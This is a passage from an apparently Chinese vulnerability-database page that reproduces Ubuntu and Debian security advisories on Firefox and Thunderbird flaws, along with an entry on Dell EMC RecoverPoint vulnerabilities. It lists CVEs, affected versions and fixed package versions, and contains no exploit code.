P6G2cAv9qtrtLPoK8++yIm955DbDkrUTfu7gGARxYRy8lSZTveglmVOW8Vjx8tFT
UpeTl+iFO8AsMYB8VOBYGeuNYykbLQjzmDo7dmLXGBP3afG86uU=
=XVYn
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F148442)

Ubuntu Security Notice USN-3705-1 (PacketStormID:F148442)
2018-07-05 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary
linux,ubuntu
CVE-2018-12358,CVE-2018-12359,CVE-2018-12360,CVE-2018-12361,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-12367,CVE-2018-12369,CVE-2018-12370,CVE-2018-12371,CVE-2018-5156,CVE-2018-5186,CVE-2018-5187,CVE-2018-5188
[点击下载]

Ubuntu Security Notice 3705-1 - Multiple security issues were discovered in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, read uninitialized memory, bypass same-origin restrictions, bypass CORS restrictions, bypass CSRF protections, obtain sensitive information, or execute arbitrary code. Various other issues were also addressed.

==========================================================================
Ubuntu Security Notice USN-3705-1
July 05, 2018

firefox vulnerabilities
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS
- Ubuntu 17.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS

Summary:

Firefox could be made to crash or run programs as your login if it
opened a malicious website.

Software Description:
- firefox: Mozilla Open Source web browser

Details:

Multiple security issues were discovered in Firefox. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service, read uninitialized
memory, bypass same-origin restrictions, bypass CORS restrictions,
bypass CSRF protections, obtain sensitive information, or execute
arbitrary code. (CVE-2018-5156, CVE-2018-5186, CVE-2018-5187,
CVE-2018-5188, CVE-2018-12358, CVE-2018-12359, CVE-2018-12360,
CVE-2018-12361, CVE-2018-12362, CVE-2018-12363, CVE-2018-12364,
CVE-2018-12365, CVE-2018-12366, CVE-2018-12367, CVE-2018-12370,
CVE-2018-12371)

A security issue was discovered with WebExtensions. If a user were
tricked in to installing a specially crafted extension, an attacker
could potentially exploit this to obtain full browser permissions.
(CVE-2018-12369)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 18.04 LTS:
  firefox                         61.0+build3-0ubuntu0.18.04.1

Ubuntu 17.10:
  firefox                         61.0+build3-0ubuntu0.17.10.1

Ubuntu 16.04 LTS:
  firefox                         61.0+build3-0ubuntu0.16.04.2

Ubuntu 14.04 LTS:
  firefox                         61.0+build3-0ubuntu0.14.04.2

After a standard system update you need to restart Firefox to make
all the necessary changes.

References:
  https://usn.ubuntu.com/usn/usn-3705-1
  CVE-2018-12358, CVE-2018-12359, CVE-2018-12360, CVE-2018-12361,
  CVE-2018-12362, CVE-2018-12363, CVE-2018-12364, CVE-2018-12365,
  CVE-2018-12366, CVE-2018-12367, CVE-2018-12369, CVE-2018-12370,
  CVE-2018-12371, CVE-2018-5156, CVE-2018-5186, CVE-2018-5187,
  CVE-2018-5188

Package Information:
  https://launchpad.net/ubuntu/+source/firefox/61.0+build3-0ubuntu0.18.04.1
  https://launchpad.net/ubuntu/+source/firefox/61.0+build3-0ubuntu0.17.10.1
  https://launchpad.net/ubuntu/+source/firefox/61.0+build3-0ubuntu0.16.04.2
  https://launchpad.net/ubuntu/+source/firefox/61.0+build3-0ubuntu0.14.04.2


    

- 漏洞信息 (F148526)

Ubuntu Security Notice USN-3714-1 (PacketStormID:F148526)
2018-07-12 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary
linux,ubuntu
CVE-2018-12359,CVE-2018-12363,CVE-2018-12364,CVE-2018-12372,CVE-2018-12373,CVE-2018-12374
[点击下载]

Ubuntu Security Notice 3714-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, bypass CORS restrictions, obtain sensitive information, or execute arbitrary code. It was discovered that S/MIME and PGP decryption oracles can be built with HTML emails. An attacker could potentially exploit this to obtain sensitive information. Various other issues were also addressed.

==========================================================================
Ubuntu Security Notice USN-3714-1
July 12, 2018

thunderbird vulnerabilities
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS
- Ubuntu 17.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in Thunderbird.

Software Description:
- thunderbird: Mozilla Open Source mail and newsgroup client

Details:

Multiple security issues were discovered in Thunderbird. If a user were
tricked in to opening a specially crafted website in a browsing context,
an attacker could potentially exploit these to cause a denial of service,
bypass CORS restrictions, obtain sensitive information, or execute
arbitrary code. (CVE-2018-12359, CVE-2018-12360, CVE-2018-12362,
CVE-2018-12363, CVE-2018-12364, CVE-2018-12365, CVE-2018-12366)

It was discovered that S/MIME and PGP decryption oracles can be built with
HTML emails. An attacker could potentially exploit this to obtain
sensitive information. (CVE-2018-12372)

It was discovered that S/MIME plaintext can be leaked through HTML
reply/forward. An attacker could potentially exploit this to obtain
sensitive information. (CVE-2018-12373)

It was discovered that forms can be used to exfiltrate encrypted mail
parts by pressing enter in a form field. An attacker could potentially
exploit this to obtain sensitive information. (CVE-2018-12374)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 18.04 LTS:
  thunderbird                     1:52.9.1+build3-0ubuntu0.18.04.1

Ubuntu 17.10:
  thunderbird                     1:52.9.1+build3-0ubuntu0.17.10.1

Ubuntu 16.04 LTS:
  thunderbird                     1:52.9.1+build3-0ubuntu0.16.04.1

Ubuntu 14.04 LTS:
  thunderbird                     1:52.9.1+build3-0ubuntu0.14.04.1

After a standard system update you need to restart Thunderbird to make
all the necessary changes.

References:
  https://usn.ubuntu.com/usn/usn-3714-1
  CVE-2018-12359, CVE-2018-12360, CVE-2018-12362, CVE-2018-12363,
  CVE-2018-12364, CVE-2018-12365, CVE-2018-12366, CVE-2018-12372,
  CVE-2018-12373, CVE-2018-12374, CVE-2018-5188

Package Information:
  https://launchpad.net/ubuntu/+source/thunderbird/1:52.9.1+build3-0ubuntu0.18.04.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:52.9.1+build3-0ubuntu0.17.10.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:52.9.1+build3-0ubuntu0.16.04.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:52.9.1+build3-0ubuntu0.14.04.1
    

- 漏洞信息 (F148553)

Debian Security Advisory 4244-1 (PacketStormID:F148553)
2018-07-14 00:00:00
Debian  debian.org
advisory,denial of service,arbitrary
linux,debian
CVE-2017-17689,CVE-2018-12359,CVE-2018-12360,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-12372,CVE-2018-12373,CVE-2018-12374,CVE-2018-5188
[点击下载]

Debian Linux Security Advisory 4244-1 - Multiple security issues have been found in Thunderbird, which may lead to the execution of arbitrary code, denial of service or attacks on encrypted emails.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4244-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
July 13, 2018                         https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : thunderbird
CVE ID         : CVE-2017-17689 CVE-2018-5188 CVE-2018-12359 CVE-2018-12360 
                 CVE-2018-12362 CVE-2018-12363 CVE-2018-12364 CVE-2018-12365 
                 CVE-2018-12366 CVE-2018-12372 CVE-2018-12373 CVE-2018-12374

Multiple security issues have been found in Thunderbird, which may lead
to the execution of arbitrary code, denial of service or attacks on
encrypted emails.

For the stable distribution (stretch), these problems have been fixed in
version 1:52.9.1-1~deb9u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAltI+2sACgkQEMKTtsN8
TjZXHRAAgOmSvTwwmmzxRH/4tSSpndZCFCtkHrG5PU5D3XesLGnWpNZk9aINsaU2
ih3fmEKzQgHHfAzK3d9TcGjyiI+PoVuWkVknsVqTrHd+xQtxUs7B/5Pfz5WKiYDJ
QJ4NhjTgHHystYa0j2CvK28/ZoPVZgwnc/D051ChTInPWXimJI+TxpsndW/NPuaJ
SphoPP34OMO2EARjrKCxiL6NRv6kD4CJv0AgoYfdO0qPXomuA8HpDAH1itd7GbRq
yVJoZRnpz9dGjJSM5wyFCc1BIqmA/CMphhmqiRTuFBA+rOSEDblzfc2tg9t82CVQ
caA7rF3VrYx8qmgpP3akCju+SDOEWLerFGHH1iaQ+GBqiXvduvMl/MSXCZmVZzIC
92Ko2m9kURkak4yKccEbHJ5Vh8i0oLUOc+Ee3MUUfWUblYbCcB4z34p9hRwc8u83
mmGUbsq+qWvdcd9NkekKC/ENQZt4Egb3doeEzqSkaa4uhFaQ1gGosHXGslNTCqLl
6RyeFON9Q5CWphQET+rmnlcJ8B1cSHgpG1ZTN6szlsQpiVgcRu/JYrgyzX9Y6WdY
rAape6t+gsEeLOP7n9pZ/KYSadUF5CvYY/nX9H6kJO1RmG9y0A+8wAEuW+nSOMMJ
vh2U09+y5XJHQqV0MMTKbnadxlyi8Oerc0zrYaoBuYhR7wmvkus=
=R2OH
-----END PGP SIGNATURE-----
    

- 漏洞信息

Dell EMC RecoverPoint and RecoverPoint for Virtual Machines Multiple Security Vulnerabilities
Design Error 104246
Yes No
2018-05-21 12:00:00 2018-05-21 12:00:00
Paul Taylor (@bao7uo) / Foregenix Ltd.

- 受影响的程序版本

EMC RecoverPoint for Virtual Machines 5.0
EMC RecoverPoint for Virtual Machines 4.3.1.4
EMC RecoverPoint for Virtual Machines 4.0
EMC RecoverPoint 5.0
EMC RecoverPoint 4.4.1.1
EMC RecoverPoint 4.4.1.0
Dell EMC RecoverPoint for Virtual Machines 5.1.1
Dell EMC RecoverPoint for Virtual Machines 5.1.1.2
Dell EMC RecoverPoint for Virtual Machines 5.1
Dell EMC RecoverPoint 5.1
,Dell EMC RecoverPoint for Virtual Machines 5.1.1.3
Dell EMC RecoverPoint 5.1.2

- 不受影响的程序版本

Dell EMC RecoverPoint for Virtual Machines 5.1.1.3
Dell EMC RecoverPoint 5.1.2

- 漏洞讨论

Dell EMC RecoverPoint and RecoverPoint for Virtual Machines are prone to the following multiple security vulnerabilities:

1. A remote code-execution vulnerability
2. An arbitrary file-read vulnerability
3. Multiple information-disclosure vulnerabilities

An attacker can leverage these issues to execute arbitrary code, read arbitrary files, or gain sensitive information within the context of the affected system. Failed exploit attempts will likely result in denial of service conditions.

The following versions are vulnerable;

Versions prior to EMC RecoverPoint 5.1.2
Versions prior to EMC RecoverPoint for Virtual Machines 5.1.1.3

- 漏洞利用

The researcher who discovered this issue has created a proof-of-concept for CVE-2018-1242. Please see the references for more information.

- 解决方案

Reportedly these issues are fixed, however Symantec has not confirmed this. Please contact the vendor for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站